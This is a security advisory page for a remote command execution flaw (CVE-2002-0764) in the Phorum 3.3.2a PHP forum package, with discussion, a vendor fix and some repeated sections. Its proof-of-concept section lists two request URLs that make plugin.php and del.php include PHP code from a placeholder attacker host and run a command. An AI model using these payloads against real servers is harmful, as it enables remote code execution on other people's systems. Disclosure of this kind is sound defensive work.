Phorum Remote Command Execution Vulnerability
BID:4763
Info
Phorum Remote Command Execution Vulnerability
| Bugtraq ID: | 4763 |
| Class: | Input Validation Error |
| CVE: |
CVE-2002-0764 |
| Remote: | Yes |
| Local: | No |
| Published: | May 17 2002 12:00AM |
| Updated: | Jul 11 2009 12:46PM |
| Credit: | Credited to Markus Arndt<[email protected]>. |
| Vulnerable: |
Phorum Phorum 3.3.2 a |
| Not Vulnerable: |
Phorum Phorum 3.3.2 b3 |
Discussion
Phorum Remote Command Execution Vulnerability
Phorum is a PHP based web forums package designed for most UNIX variants, Linux, and Microsoft Windows operating systems.
A vulnerability has been reported in Phorum that will allow remote attackers to specify external PHP scripts and potentially execute commands.
The vulnerability exists in 'plugin.php','admin.php' and 'del.php' files found in the distribution of Phorum. It is possible for a malicious attacker to specify the location of a parameter to the vulnerable PHP files by passing an argument via URL to the PHP files.
Phorum is a PHP based web forums package designed for most UNIX variants, Linux, and Microsoft Windows operating systems.
A vulnerability has been reported in Phorum that will allow remote attackers to specify external PHP scripts and potentially execute commands.
The vulnerability exists in 'plugin.php','admin.php' and 'del.php' files found in the distribution of Phorum. It is possible for a malicious attacker to specify the location of a parameter to the vulnerable PHP files by passing an argument via URL to the PHP files.
Exploit / POC
Phorum Remote Command Execution Vulnerability
The following examples were submitted:
http://[target]/phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=http://[evilhost]&cmd=ls
http://[vulnerablehost]/phorum/admin/actions/del.php?include_path=http://[evilhost]&cmd=ls
The following examples were submitted:
http://[target]/phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=http://[evilhost]&cmd=ls
http://[vulnerablehost]/phorum/admin/actions/del.php?include_path=http://[evilhost]&cmd=ls
Solution / Fix
Phorum Remote Command Execution Vulnerability
Solution:
The vendor has released a new version to address this issue.
Phorum Phorum 3.3.2 a
Solution:
The vendor has released a new version to address this issue.
Phorum Phorum 3.3.2 a
-
Phorum phorum-3.3.2b3.tar.gz
http://phorum.org/downloads/phorum-3.3.2b3.tar.gz